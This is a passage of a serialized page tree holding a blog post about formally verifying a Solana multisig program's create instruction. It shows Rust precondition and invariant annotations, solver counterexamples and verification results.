0\n",{"type":24,"tag":301,"props":31036,"children":31037},{"class":303,"line":344},[31038],{"type":24,"tag":301,"props":31039,"children":31040},{"style":359},[31041],{"type":30,"value":27029},{"type":24,"tag":301,"props":31043,"children":31044},{"class":303,"line":401},[31045,31049,31053,31057,31061,31065,31069,31073],{"type":24,"tag":301,"props":31046,"children":31047},{"style":348},[31048],{"type":30,"value":20484},{"type":24,"tag":301,"props":31050,"children":31051},{"style":348},[31052],{"type":30,"value":20489},{"type":24,"tag":301,"props":31054,"children":31055},{"style":314},[31056],{"type":30,"value":13930},{"type":24,"tag":301,"props":31058,"children":31059},{"style":359},[31060],{"type":30,"value":362},{"type":24,"tag":301,"props":31062,"children":31063},{"style":385},[31064],{"type":30,"value":4054},{"type":24,"tag":301,"props":31066,"children":31067},{"style":359},[31068],{"type":30,"value":30745},{"type":24,"tag":301,"props":31070,"children":31071},{"style":385},[31072],{"type":30,"value":4054},{"type":24,"tag":301,"props":31074,"children":31075},{"style":359},[31076],{"type":30,"value":16401},{"type":24,"tag":32,"props":31078,"children":31079},{},[31080],{"type":30,"value":31081},"A third counterexample:",{"type":24,"tag":291,"props":31083,"children":31085},{"code":31084},"threshold: 4\ncreate_key: ...\nmembers: SparseVec { size: 536870920 }\n",[31086],{"type":24,"tag":145,"props":31087,"children":31088},{"__ignoreMap":7},[31089],{"type":30,"value":31084},{"type":24,"tag":32,"props":31091,"children":31092},{},[31093,31095,31101],{"type":30,"value":31094},"Here we see the size of our ",{"type":24,"tag":145,"props":31096,"children":31098},{"className":31097},[],[31099],{"type":30,"value":31100},"members",{"type":30,"value":31102}," vec is huge! We need to constrain that to be less than u16::MAX:",{"type":24,"tag":291,"props":31104,"children":31106},{"code":31105,"language":9817,"meta":7,"className":9818,"style":7},"#[succeeds_if(\n (threshold as usize) \u003C= members.len()\n && (threshold != 0)\n && (members.len() \u003C= (u16::MAX as usize))\n)]\npub fn create(...) { ... }\n",[31107],{"type":24,"tag":145,"props":31108,"children":31109},{"__ignoreMap":7},[31110,31117,31152,31173,31225,31232],{"type":24,"tag":301,"props":31111,"children":31112},{"class":303,"line":304},[31113],{"type":24,"tag":301,"props":31114,"children":31115},{"style":359},[31116],{"type":30,"value":30867},{"type":24,"tag":301,"props":31118,"children":31119},{"class":303,"line":320},[31120,31124,31128,31132,31136,31140,31144,31148],{"type":24,"tag":301,"props":31121,"children":31122},{"style":359},[31123],{"type":30,"value":30875},{"type":24,"tag":301,"props":31125,"children":31126},{"style":348},[31127],{"type":30,"value":15654},{"type":24,"tag":301,"props":31129,"children":31130},{"style":10246},[31131],{"type":30,"value":20525},{"type":24,"tag":301,"props":31133,"children":31134},{"style":359},[31135],{"type":30,"value":911},{"type":24,"tag":301,"props":31137,"children":31138},{"style":385},[31139],{"type":30,"value":26188},{"type":24,"tag":301,"props":31141,"children":31142},{"style":359},[31143],{"type":30,"value":30151},{"type":24,"tag":301,"props":31145,"children":31146},{"style":385},[31147],{"type":30,"value":206},{"type":24,"tag":301,"props":31149,"children":31150},{"style":359},[31151],{"type":30,"value":30904},{"type":24,"tag":301,"props":31153,"children":31154},{"class":303,"line":335},[31155,31159,31164,31168],{"type":24,"tag":301,"props":31156,"children":31157},{"style":385},[31158],{"type":30,"value":22410},{"type":24,"tag":301,"props":31160,"children":31161},{"style":359},[31162],{"type":30,"value":31163}," (threshold ",{"type":24,"tag":301,"props":31165,"children":31166},{"style":385},[31167],{"type":30,"value":463},{"type":24,"tag":301,"props":31169,"children":31170},{"style":359},[31171],{"type":30,"value":31172}," 0)\n",{"type":24,"tag":301,"props":31174,"children":31175},{"class":303,"line":344},[31176,31180,31184,31188,31192,31196,31200,31205,31209,31213,31217,31221],{"type":24,"tag":301,"props":31177,"children":31178},{"style":385},[31179],{"type":30,"value":22410},{"type":24,"tag":301,"props":31181,"children":31182},{"style":359},[31183],{"type":30,"value":29766},{"type":24,"tag":301,"props":31185,"children":31186},{"style":385},[31187],{"type":30,"value":206},{"type":24,"tag":301,"props":31189,"children":31190},{"style":359},[31191],{"type":30,"value":27790},{"type":24,"tag":301,"props":31193,"children":31194},{"style":385},[31195],{"type":30,"value":26188},{"type":24,"tag":301,"props":31197,"children":31198},{"style":359},[31199],{"type":30,"value":873},{"type":24,"tag":301,"props":31201,"children":31202},{"style":10246},[31203],{"type":30,"value":31204},"u16",{"type":24,"tag":301,"props":31206,"children":31207},{"style":385},[31208],{"type":30,"value":10308},{"type":24,"tag":301,"props":31210,"children":31211},{"style":10246},[31212],{"type":30,"value":27808},{"type":24,"tag":301,"props":31214,"children":31215},{"style":348},[31216],{"type":30,"value":15640},{"type":24,"tag":301,"props":31218,"children":31219},{"style":10246},[31220],{"type":30,"value":20525},{"type":24,"tag":301,"props":31222,"children":31223},{"style":359},[31224],{"type":30,"value":9381},{"type":24,"tag":301,"props":31226,"children":31227},{"class":303,"line":401},[31228],{"type":24,"tag":301,"props":31229,"children":31230},{"style":359},[31231],{"type":30,"value":27029},{"type":24,"tag":301,"props":31233,"children":31234},{"class":303,"line":415},[31235,31239,31243,31247,31251,31255,31259,31263],{"type":24,"tag":301,"props":31236,"children":31237},{"style":348},[31238],{"type":30,"value":20484},{"type":24,"tag":301,"props":31240,"children":31241},{"style":348},[31242],{"type":30,"value":20489},{"type":24,"tag":301,"props":31244,"children":31245},{"style":314},[31246],{"type":30,"value":13930},{"type":24,"tag":301,"props":31248,"children":31249},{"style":359},[31250],{"type":30,"value":362},{"type":24,"tag":301,"props":31252,"children":31253},{"style":385},[31254],{"type":30,"value":4054},{"type":24,"tag":301,"props":31256,"children":31257},{"style":359},[31258],{"type":30,"value":30745},{"type":24,"tag":301,"props":31260,"children":31261},{"style":385},[31262],{"type":30,"value":4054},{"type":24,"tag":301,"props":31264,"children":31265},{"style":359},[31266],{"type":30,"value":16401},{"type":24,"tag":32,"props":31268,"children":31269},{},[31270],{"type":30,"value":31271},"And now we get:",{"type":24,"tag":291,"props":31273,"children":31275},{"code":31274},"VERIFICATION:- SUCCESSFUL\nVerification Time: 6.6634517s\n",[31276],{"type":24,"tag":145,"props":31277,"children":31278},{"__ignoreMap":7},[31279],{"type":30,"value":31274},{"type":24,"tag":32,"props":31281,"children":31282},{},[31283],{"type":30,"value":31284},"🥳🥳🥳",{"type":24,"tag":32,"props":31286,"children":31287},{},[31288],{"type":30,"value":31289},"The attentive reader may have noticed that we didn't need to verify this condition:",{"type":24,"tag":291,"props":31291,"children":31293},{"code":31292,"language":9817,"meta":7,"className":9818,"style":7},"if total_members \u003C 1 {\n return err!(MsError::EmptyMembers);\n}\n",[31294],{"type":24,"tag":145,"props":31295,"children":31296},{"__ignoreMap":7},[31297,31320,31351],{"type":24,"tag":301,"props":31298,"children":31299},{"class":303,"line":304},[31300,31304,31308,31312,31316],{"type":24,"tag":301,"props":31301,"children":31302},{"style":308},[31303],{"type":30,"value":22368},{"type":24,"tag":301,"props":31305,"children":31306},{"style":369},[31307],{"type":30,"value":30230},{"type":24,"tag":301,"props":31309,"children":31310},{"style":385},[31311],{"type":30,"value":3950},{"type":24,"tag":301,"props":31313,"children":31314},{"style":466},[31315],{"type":30,"value":487},{"type":24,"tag":301,"props":31317,"children":31318},{"style":359},[31319],{"type":30,"value":3035},{"type":24,"tag":301,"props":31321,"children":31322},{"class":303,"line":320},[31323,31327,31331,31335,31339,31343,31347],{"type":24,"tag":301,"props":31324,"children":31325},{"style":308},[31326],{"type":30,"value":680},{"type":24,"tag":301,"props":31328,"children":31329},{"style":314},[31330],{"type":30,"value":30285},{"type":24,"tag":301,"props":31332,"children":31333},{"style":359},[31334],{"type":30,"value":362},{"type":24,"tag":301,"props":31336,"children":31337},{"style":10246},[31338],{"type":30,"value":30294},{"type":24,"tag":301,"props":31340,"children":31341},{"style":385},[31342],{"type":30,"value":10308},{"type":24,"tag":301,"props":31344,"children":31345},{"style":10246},[31346],{"type":30,"value":30303},{"type":24,"tag":301,"props":31348,"children":31349},{"style":359},[31350],{"type":30,"value":589},{"type":24,"tag":301,"props":31352,"children":31353},{"class":303,"line":335},[31354],{"type":24,"tag":301,"props":31355,"children":31356},{"style":359},[31357],{"type":30,"value":698},{"type":24,"tag":32,"props":31359,"children":31360},{},[31361,31363,31369,31371,31376,31378,31383,31385,31390],{"type":30,"value":31362},"In this case this is actually redundant because if ",{"type":24,"tag":145,"props":31364,"children":31366},{"className":31365},[],[31367],{"type":30,"value":31368},"members.len() == 0",{"type":30,"value":31370}," then our threshold would also have to be ",{"type":24,"tag":145,"props":31372,"children":31374},{"className":31373},[],[31375],{"type":30,"value":584},{"type":30,"value":31377}," (and our ",{"type":24,"tag":145,"props":31379,"children":31381},{"className":31380},[],[31382],{"type":30,"value":29517},{"type":30,"value":31384}," is not allowed to be ",{"type":24,"tag":145,"props":31386,"children":31388},{"className":31387},[],[31389],{"type":30,"value":584},{"type":30,"value":31391},"). The solver realizes that this situation is impossible and therefore the expression we have above is sufficient!",{"type":24,"tag":80,"props":31393,"children":31395},{"id":31394},"_2-verify-threshold-requirements",[31396],{"type":30,"value":31397},"2. Verify threshold requirements",{"type":24,"tag":32,"props":31399,"children":31400},{},[31401],{"type":30,"value":31402},"A critical security property for multisigs is that the threshold should never be zero (which would let anyone issue transactions) and the threshold should never be greater than the number of members (which would let nobody issue transactions).",{"type":24,"tag":32,"props":31404,"children":31405},{},[31406,31408,31412],{"type":30,"value":31407},"Unlike the previous example, we want to verify this in ",{"type":24,"tag":5422,"props":31409,"children":31410},{},[31411],{"type":30,"value":16107},{"type":30,"value":31413}," cases. I.e. any instruction that could mutate the multisig account.",{"type":24,"tag":32,"props":31415,"children":31416},{},[31417,31419,31423,31425,31430],{"type":30,"value":31418},"In this case, we want to model this as an ",{"type":24,"tag":5422,"props":31420,"children":31421},{},[31422],{"type":30,"value":28547},{"type":30,"value":31424}," on the ",{"type":24,"tag":145,"props":31426,"children":31428},{"className":31427},[],[31429],{"type":30,"value":29509},{"type":30,"value":31431}," account struct:",{"type":24,"tag":291,"props":31433,"children":31435},{"code":31434,"language":9817,"meta":7,"className":9818,"style":7},"#[account]\n#[derive(Clone, Debug)]\n#[invariant(\n (self.threshold >= 1)\n && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms {\n pub threshold: u16, // threshold for signatures\n pub authority_index: u16, // index to seed other authorities under this multisig\n pub transaction_index: u32, // look up and seed reference for transactions\n pub ms_change_index: u32, // the last executed/closed transaction\n pub bump: u8, // bump for the multisig seed\n pub create_key: Pubkey, // random key(or not) used to seed the multisig pda\n pub allow_external_execute: bool, // allow non-member keys to execute txs\n pub keys: Vec\u003CPubkey>, // keys of the members\n}\n",[31436],{"type":24,"tag":145,"props":31437,"children":31438},{"__ignoreMap":7},[31439,31446,31471,31478,31502,31553,31560,31579,31606,31633,31660,31687,31714,31741,31768,31803],{"type":24,"tag":301,"props":31440,"children":31441},{"class":303,"line":304},[31442],{"type":24,"tag":301,"props":31443,"children":31444},{"style":359},[31445],{"type":30,"value":27539},{"type":24,"tag":301,"props":31447,"children":31448},{"class":303,"line":320},[31449,31453,31458,31462,31467],{"type":24,"tag":301,"props":31450,"children":31451},{"style":359},[31452],{"type":30,"value":29605},{"type":24,"tag":301,"props":31454,"children":31455},{"style":10246},[31456],{"type":30,"value":31457},"Clone",{"type":24,"tag":301,"props":31459,"children":31460},{"style":359},[31461],{"type":30,"value":377},{"type":24,"tag":301,"props":31463,"children":31464},{"style":10246},[31465],{"type":30,"value":31466},"Debug",{"type":24,"tag":301,"props":31468,"children":31469},{"style":359},[31470],{"type":30,"value":27029},{"type":24,"tag":301,"props":31472,"children":31473},{"class":303,"line":335},[31474],{"type":24,"tag":301,"props":31475,"children":31476},{"style":359},[31477],{"type":30,"value":27547},{"type":24,"tag":301,"props":31479,"children":31480},{"class":303,"line":344},[31481,31486,31490,31494,31498],{"type":24,"tag":301,"props":31482,"children":31483},{"style":359},[31484],{"type":30,"value":31485}," (self",{"type":24,"tag":301,"props":31487,"children":31488},{"style":385},[31489],{"type":30,"value":206},{"type":24,"tag":301,"props":31491,"children":31492},{"style":359},[31493],{"type":30,"value":27840},{"type":24,"tag":301,"props":31495,"children":31496},{"style":385},[31497],{"type":30,"value":16748},{"type":24,"tag":301,"props":31499,"children":31500},{"style":359},[31501],{"type":30,"value":27849},{"type":24,"tag":301,"props":31503,"children":31504},{"class":303,"line":401},[31505,31509,31513,31517,31521,31525,31529,31533,31537,31541,31545,31549],{"type":24,"tag":301,"props":31506,"children":31507},{"style":385},[31508],{"type":30,"value":22410},{"type":24,"tag":301,"props":31510,"children":31511},{"style":359},[31512],{"type":30,"value":27773},{"type":24,"tag":301,"props":31514,"children":31515},{"style":385},[31516],{"type":30,"value":206},{"type":24,"tag":301,"props":31518,"children":31519},{"style":359},[31520],{"type":30,"value":27840},{"type":24,"tag":301,"props":31522,"children":31523},{"style":348},[31524],{"type":30,"value":15654},{"type":24,"tag":301,"props":31526,"children":31527},{"style":10246},[31528],{"type":30,"value":20525},{"type":24,"tag":301,"props":31530,"children":31531},{"style":385},[31532],{"type":30,"value":15012},{"type":24,"tag":301,"props":31534,"children":31535},{"style":359},[31536],{"type":30,"value":20590},{"type":24,"tag":301,"props":31538,"children":31539},{"style":385},[31540],{"type":30,"value":206},{"type":24,"tag":301,"props":31542,"children":31543},{"style":359},[31544],{"type":30,"value":27752},{"type":24,"tag":301,"props":31546,"children":31547},{"style":385},[31548],{"type":30,"value":206},{"type":24,"tag":301,"props":31550,"children":31551},{"style":359},[31552],{"type":30,"value":27901},{"type":24,"tag":301,"props":31554,"children":31555},{"class":303,"line":415},[31556],{"type":24,"tag":301,"props":31557,"children":31558},{"style":359},[31559],{"type":30,"value":27029},{"type":24,"tag":301,"props":31561,"children":31562},{"class":303,"line":439},[31563,31567,31571,31575],{"type":24,"tag":301,"props":31564,"children":31565},{"style":348},[31566],{"type":30,"value":20484},{"type":24,"tag":301,"props":31568,"children":31569},{"style":348},[31570],{"type":30,"value":27920},{"type":24,"tag":301,"props":31572,"children":31573},{"style":10246},[31574],{"type":30,"value":27925},{"type":24,"tag":301,"props":31576,"children":31577},{"style":359},[31578],{"type":30,"value":3035},{"type":24,"tag":301,"props":31580,"children":31581},{"class":303,"line":447},[31582,31586,31590,31594,31598,31602],{"type":24,"tag":301,"props":31583,"children":31584},{"style":348},[31585],{"type":30,"value":27612},{"type":24,"tag":301,"props":31587,"children":31588},{"style":369},[31589],{"type":30,"value":27941},{"type":24,"tag":301,"props":31591,"children":31592},{"style":385},[31593],{"type":30,"value":1679},{"type":24,"tag":301,"props":31595,"children":31596},{"style":10246},[31597],{"type":30,"value":27799},{"type":24,"tag":301,"props":31599,"children":31600},{"style":359},[31601],{"type":30,"value":27954},{"type":24,"tag":301,"props":31603,"children":31604},{"style":1062},[31605],{"type":30,"value":27959},{"type":24,"tag":301,"props":31607,"children":31608},{"class":303,"line":476},[31609,31613,31617,31621,31625,31629],{"type":24,"tag":301,"props":31610,"children":31611},{"style":348},[31612],{"type":30,"value":27612},{"type":24,"tag":301,"props":31614,"children":31615},{"style":369},[31616],{"type":30,"value":27971},{"type":24,"tag":301,"props":31618,"children":31619},{"style":385},[31620],{"type":30,"value":1679},{"type":24,"tag":301,"props":31622,"children":31623},{"style":10246},[31624],{"type":30,"value":27799},{"type":24,"tag":301,"props":31626,"children":31627},{"style":359},[31628],{"type":30,"value":27984},{"type":24,"tag":301,"props":31630,"children":31631},{"style":1062},[31632],{"type":30,"value":27989},{"type":24,"tag":301,"props":31634,"children":31635},{"class":303,"line":495},[31636,31640,31644,31648,31652,31656],{"type":24,"tag":301,"props":31637,"children":31638},{"style":348},[31639],{"type":30,"value":27612},{"type":24,"tag":301,"props":31641,"children":31642},{"style":369},[31643],{"type":30,"value":28001},{"type":24,"tag":301,"props":31645,"children":31646},{"style":385},[31647],{"type":30,"value":1679},{"type":24,"tag":301,"props":31649,"children":31650},{"style":10246},[31651],{"type":30,"value":24327},{"type":24,"tag":301,"props":31653,"children":31654},{"style":359},[31655],{"type":30,"value":28014},{"type":24,"tag":301,"props":31657,"children":31658},{"style":1062},[31659],{"type":30,"value":28019},{"type":24,"tag":301,"props":31661,"children":31662},{"class":303,"line":504},[31663,31667,31671,31675,31679,31683],{"type":24,"tag":301,"props":31664,"children":31665},{"style":348},[31666],{"type":30,"value":27612},{"type":24,"tag":301,"props":31668,"children":31669},{"style":369},[31670],{"type":30,"value":28031},{"type":24,"tag":301,"props":31672,"children":31673},{"style":385},[31674],{"type":30,"value":1679},{"type":24,"tag":301,"props":31676,"children":31677},{"style":10246},[31678],{"type":30,"value":24327},{"type":24,"tag":301,"props":31680,"children":31681},{"style":359},[31682],{"type":30,"value":27984},{"type":24,"tag":301,"props":31684,"children":31685},{"style":1062},[31686],{"type":30,"value":28048},{"type":24,"tag":301,"props":31688,"children":31689},{"class":303,"line":512},[31690,31694,31698,31702,31706,31710],{"type":24,"tag":301,"props":31691,"children":31692},{"style":348},[31693],{"type":30,"value":27612},{"type":24,"tag":301,"props":31695,"children":31696},{"style":369},[31697],{"type":30,"value":28060},{"type":24,"tag":301,"props":31699,"children":31700},{"style":385},[31701],{"type":30,"value":1679},{"type":24,"tag":301,"props":31703,"children":31704},{"style":10246},[31705],{"type":30,"value":21426},{"type":24,"tag":301,"props":31707,"children":31708},{"style":359},[31709],{"type":30,"value":28073},{"type":24,"tag":301,"props":31711,"children":31712},{"style":1062},[31713],{"type":30,"value":28078},{"type":24,"tag":301,"props":31715,"children":31716},{"class":303,"line":592},[31717,31721,31725,31729,31733,31737],{"type":24,"tag":301,"props":31718,"children":31719},{"style":348},[31720],{"type":30,"value":27612},{"type":24,"tag":301,"props":31722,"children":31723},{"style":369},[31724],{"type":30,"value":28090},{"type":24,"tag":301,"props":31726,"children":31727},{"style":385},[31728],{"type":30,"value":1679},{"type":24,"tag":301,"props":31730,"children":31731},{"style":10246},[31732],{"type":30,"value":27626},{"type":24,"tag":301,"props":31734,"children":31735},{"style":359},[31736],{"type":30,"value":28103},{"type":24,"tag":301,"props":31738,"children":31739},{"style":1062},[31740],{"type":30,"value":28108},{"type":24,"tag":301,"props":31742,"children":31743},{"class":303,"line":619},[31744,31748,31752,31756,31760,31764],{"type":24,"tag":301,"props":31745,"children":31746},{"style":348},[31747],{"type":30,"value":27612},{"type":24,"tag":301,"props":31749,"children":31750},{"style":369},[31751],{"type":30,"value":28120},{"type":24,"tag":301,"props":31753,"children":31754},{"style":385},[31755],{"type":30,"value":1679},{"type":24,"tag":301,"props":31757,"children":31758},{"style":10246},[31759],{"type":30,"value":18848},{"type":24,"tag":301,"props":31761,"children":31762},{"style":359},[31763],{"type":30,"value":377},{"type":24,"tag":301,"props":31765,"children":31766},{"style":1062},[31767],{"type":30,"value":28137},{"type":24,"tag":301,"props":31769,"children":31770},{"class":303,"line":635},[31771,31775,31779,31783,31787,31791,31795,31799],{"type":24,"tag":301,"props":31772,"children":31773},{"style":348},[31774],{"type":30,"value":27612},{"type":24,"tag":301,"props":31776,"children":31777},{"style":369},[31778],{"type":30,"value":28149},{"type":24,"tag":301,"props":31780,"children":31781},{"style":385},[31782],{"type":30,"value":1679},{"type":24,"tag":301,"props":31784,"children":31785},{"style":10246},[31786],{"type":30,"value":28158},{"type":24,"tag":301,"props":31788,"children":31789},{"style":359},[31790],{"type":30,"value":1849},{"type":24,"tag":301,"props":31792,"children":31793},{"style":10246},[31794],{"type":30,"value":28167},{"type":24,"tag":301,"props":31796,"children":31797},{"style":359},[31798],{"type":30,"value":28172},{"type":24,"tag":301,"props":31800,"children":31801},{"style":1062},[31802],{"type":30,"value":28177},{"type":24,"tag":301,"props":31804,"children":31805},{"class":303,"line":643},[31806],{"type":24,"tag":301,"props":31807,"children":31808},{"style":359},[31809],{"type":30,"value":698},{"type":24,"tag":32,"props":31811,"children":31812},{},[31813,31815,31820],{"type":30,"value":31814},"Our verification framework will generate an invariant harness for each instruction. Instructions that can potentially modify the ",{"type":24,"tag":145,"props":31816,"children":31818},{"className":31817},[],[31819],{"type":30,"value":29509},{"type":30,"value":31821}," object will be checked to ensure that the invariant still holds after modification.",{"type":24,"tag":32,"props":31823,"children":31824},{},[31825,31827,31832],{"type":30,"value":31826},"Let's try this on the ",{"type":24,"tag":145,"props":31828,"children":31830},{"className":31829},[],[31831],{"type":30,"value":29588},{"type":30,"value":31833}," instruction that we've already seen:",{"type":24,"tag":291,"props":31835,"children":31837},{"code":31836},"VERIFICATION:- SUCCESSFUL\nVerification Time: 6.8006988s\n",[31838],{"type":24,"tag":145,"props":31839,"children":31840},{"__ignoreMap":7},[31841],{"type":30,"value":31836},{"type":24,"tag":32,"props":31843,"children":31844},{},[31845,31847,31852],{"type":30,"value":31846},"To ensure this is working, we can test by commenting out this check from ",{"type":24,"tag":145,"props":31848,"children":31850},{"className":31849},[],[31851],{"type":30,"value":29588},{"type":30,"value":1679},{"type":24,"tag":291,"props":31854,"children":31856},{"code":31855,"language":9817,"meta":7,"className":9818,"style":7},"// if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n// return err!(MsError::InvalidThreshold);\n// }\n",[31857],{"type":24,"tag":145,"props":31858,"children":31859},{"__ignoreMap":7},[31860,31868,31876],{"type":24,"tag":301,"props":31861,"children":31862},{"class":303,"line":304},[31863],{"type":24,"tag":301,"props":31864,"children":31865},{"style":1062},[31866],{"type":30,"value":31867},"// if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n",{"type":24,"tag":301,"props":31869,"children":31870},{"class":303,"line":320},[31871],{"type":24,"tag":301,"props":31872,"children":31873},{"style":1062},[31874],{"type":30,"value":31875},"// return err!(MsError::InvalidThreshold);\n",{"type":24,"tag":301,"props":31877,"children":31878},{"class":303,"line":335},[31879],{"type":24,"tag":301,"props":31880,"children":31881},{"style":1062},[31882],{"type":30,"value":31883},"// }\n",{"type":24,"tag":32,"props":31885,"children":31886},{},[31887],{"type":30,"value":31888},"And run again:",{"type":24,"tag":291,"props":31890,"children":31892},{"code":31891},"VERIFICATION:- FAILED\nVerification Time: 8.245743s\n",[31893],{"type":24,"tag":145,"props":31894,"children":31895},{"__ignoreMap":7},[31896],{"type":30,"value":31891},{"type":24,"tag":32,"props":31898,"children":31899},{},[31900],{"type":30,"value":31901},"We get the following counterexample:",{"type":24,"tag":291,"props":31903,"children":31905},{"code":31904,"language":9817,"meta":7,"className":9818,"style":7},"Account {\n account: Ms {\n threshold: 32768,\n authority_index: 1,\n transaction_index: 0,\n ms_change_index: 0,\n bump: 0,\n create_key: ...,\n allow_external_execute: false,\n keys: SparseVec {\n size: 5112,\n },\n },\n info: AccountInfo { ... },\n}\n",[31906],{"type":24,"tag":145,"props":31907,"children":31908},{"__ignoreMap":7},[31909,31920,31940,31960,31980,32000,32020,32040,32060,32080,32101,32122,32130,32138,32168],{"type":24,"tag":301,"props":31910,"children":31911},{"class":303,"line":304},[31912,31916],{"type":24,"tag":301,"props":31913,"children":31914},{"style":10246},[31915],{"type":30,"value":23926},{"type":24,"tag":301,"props":31917,"children":31918},{"style":359},[31919],{"type":30,"value":3035},{"type":24,"tag":301,"props":31921,"children":31922},{"class":303,"line":320},[31923,31928,31932,31936],{"type":24,"tag":301,"props":31924,"children":31925},{"style":369},[31926],{"type":30,"value":31927}," account",{"type":24,"tag":301,"props":31929,"children":31930},{"style":385},[31931],{"type":30,"value":1679},{"type":24,"tag":301,"props":31933,"children":31934},{"style":10246},[31935],{"type":30,"value":27925},{"type":24,"tag":301,"props":31937,"children":31938},{"style":359},[31939],{"type":30,"value":3035},{"type":24,"tag":301,"props":31941,"children":31942},{"class":303,"line":335},[31943,31947,31951,31956],{"type":24,"tag":301,"props":31944,"children":31945},{"style":369},[31946],{"type":30,"value":30588},{"type":24,"tag":301,"props":31948,"children":31949},{"style":385},[31950],{"type":30,"value":1679},{"type":24,"tag":301,"props":31952,"children":31953},{"style":466},[31954],{"type":30,"value":31955}," 32768",{"type":24,"tag":301,"props":31957,"children":31958},{"style":359},[31959],{"type":30,"value":1729},{"type":24,"tag":301,"props":31961,"children":31962},{"class":303,"line":344},[31963,31968,31972,31976],{"type":24,"tag":301,"props":31964,"children":31965},{"style":369},[31966],{"type":30,"value":31967}," authority_index",{"type":24,"tag":301,"props":31969,"children":31970},{"style":385},[31971],{"type":30,"value":1679},{"type":24,"tag":301,"props":31973,"children":31974},{"style":466},[31975],{"type":30,"value":487},{"type":24,"tag":301,"props":31977,"children":31978},{"style":359},[31979],{"type":30,"value":1729},{"type":24,"tag":301,"props":31981,"children":31982},{"class":303,"line":401},[31983,31988,31992,31996],{"type":24,"tag":301,"props":31984,"children":31985},{"style":369},[31986],{"type":30,"value":31987}," transaction_index",{"type":24,"tag":301,"props":31989,"children":31990},{"style":385},[31991],{"type":30,"value":1679},{"type":24,"tag":301,"props":31993,"children":31994},{"style":466},[31995],{"type":30,"value":685},{"type":24,"tag":301,"props":31997,"children":31998},{"style":359},[31999],{"type":30,"value":1729},{"type":24,"tag":301,"props":32001,"children":32002},{"class":303,"line":415},[32003,32008,32012,32016],{"type":24,"tag":301,"props":32004,"children":32005},{"style":369},[32006],{"type":30,"value":32007}," ms_change_index",{"type":24,"tag":301,"props":32009,"children":32010},{"style":385},[32011],{"type":30,"value":1679},{"type":24,"tag":301,"props":32013,"children":32014},{"style":466},[32015],{"type":30,"value":685},{"type":24,"tag":301,"props":32017,"children":32018},{"style":359},[32019],{"type":30,"value":1729},{"type":24,"tag":301,"props":32021,"children":32022},{"class":303,"line":439},[32023,32028,32032,32036],{"type":24,"tag":301,"props":32024,"children":32025},{"style":369},[32026],{"type":30,"value":32027}," bump",{"type":24,"tag":301,"props":32029,"children":32030},{"style":385},[32031],{"type":30,"value":1679},{"type":24,"tag":301,"props":32033,"children":32034},{"style":466},[32035],{"type":30,"value":685},{"type":24,"tag":301,"props":32037,"children":32038},{"style":359},[32039],{"type":30,"value":1729},{"type":24,"tag":301,"props":32041,"children":32042},{"class":303,"line":447},[32043,32047,32051,32056],{"type":24,"tag":301,"props":32044,"children":32045},{"style":369},[32046],{"type":30,"value":30600},{"type":24,"tag":301,"props":32048,"children":32049},{"style":385},[32050],{"type":30,"value":1679},{"type":24,"tag":301,"props":32052,"children":32053},{"style":385},[32054],{"type":30,"value":32055}," ...",{"type":24,"tag":301,"props":32057,"children":32058},{"style":359},[32059],{"type":30,"value":1729},{"type":24,"tag":301,"props":32061,"children":32062},{"class":303,"line":476},[32063,32068,32072,32076],{"type":24,"tag":301,"props":32064,"children":32065},{"style":369},[32066],{"type":30,"value":32067}," allow_external_execute",{"type":24,"tag":301,"props":32069,"children":32070},{"style":385},[32071],{"type":30,"value":1679},{"type":24,"tag":301,"props":32073,"children":32074},{"style":348},[32075],{"type":30,"value":3613},{"type":24,"tag":301,"props":32077,"children":32078},{"style":359},[32079],{"type":30,"value":1729},{"type":24,"tag":301,"props":32081,"children":32082},{"class":303,"line":495},[32083,32088,32092,32097],{"type":24,"tag":301,"props":32084,"children":32085},{"style":369},[32086],{"type":30,"value":32087}," keys",{"type":24,"tag":301,"props":32089,"children":32090},{"style":385},[32091],{"type":30,"value":1679},{"type":24,"tag":301,"props":32093,"children":32094},{"style":10246},[32095],{"type":30,"value":32096}," SparseVec",{"type":24,"tag":301,"props":32098,"children":32099},{"style":359},[32100],{"type":30,"value":3035},{"type":24,"tag":301,"props":32102,"children":32103},{"class":303,"line":504},[32104,32109,32113,32118],{"type":24,"tag":301,"props":32105,"children":32106},{"style":369},[32107],{"type":30,"value":32108}," size",{"type":24,"tag":301,"props":32110,"children":32111},{"style":385},[32112],{"type":30,"value":1679},{"type":24,"tag":301,"props":32114,"children":32115},{"style":466},[32116],{"type":30,"value":32117}," 5112",{"type":24,"tag":301,"props":32119,"children":32120},{"style":359},[32121],{"type":30,"value":1729},{"type":24,"tag":301,"props":32123,"children":32124},{"class":303,"line":512},[32125],{"type":24,"tag":301,"props":32126,"children":32127},{"style":359},[32128],{"type":30,"value":32129}," },\n",{"type":24,"tag":301,"props":32131,"children":32132},{"class":303,"line":592},[32133],{"type":24,"tag":301,"props":32134,"children":32135},{"style":359},[32136],{"type":30,"value":32137}," },\n",{"type":24,"tag":301,"props":32139,"children":32140},{"class":303,"line":619},[32141,32146,32150,32155,32159,32163],{"type":24,"tag":301,"props":32142,"children":32143},{"style":369},[32144],{"type":30,"value":32145}," info",{"type":24,"tag":301,"props":32147,"children":32148},{"style":385},[32149],{"type":30,"value":1679},{"type":24,"tag":301,"props":32151,"children":32152},{"style":10246},[32153],{"type":30,"value":32154}," AccountInfo",{"type":24,"tag":301,"props":32156,"children":32157},{"style":359},[32158],{"type":30,"value":16392},{"type":24,"tag":301,"props":32160,"children":32161},{"style":385},[32162],{"type":30,"value":4054},{"type":24,"tag":301,"props":32164,"children":32165},{"style":359},[32166],{"type":30,"value":32167}," },\n",{"type":24,"tag":301,"props":32169,"children":32170},{"class":303,"line":635},[32171],{"type":24,"tag":301,"props":32172,"children":32173},{"style":359},[32174],{"type":30,"value":698},{"type":24,"tag":32,"props":32176,"children":32177},{},[32178,32180,32185,32187,32192],{"type":30,"value":32179},"Here we see that the ",{"type":24,"tag":145,"props":32181,"children":32183},{"className":32182},[],[32184],{"type":30,"value":29517},{"type":30,"value":32186}," of the newly created ",{"type":24,"tag":145,"props":32188,"children":32190},{"className":32189},[],[32191],{"type":30,"value":29509},{"type":30,"value":32193}," account is larger than the number of keys (5112) which breaks our struct invariant.",{"type":24,"tag":80,"props":32195,"children":32197},{"id":32196},"verify-requirements-to-remove-a-member",[32198],{"type":30,"value":29547},{"type":24,"tag":32,"props":32200,"children":32201},{},[32202,32204,32209,32210,32215,32217,32223],{"type":30,"value":32203},"Now that we've seen both 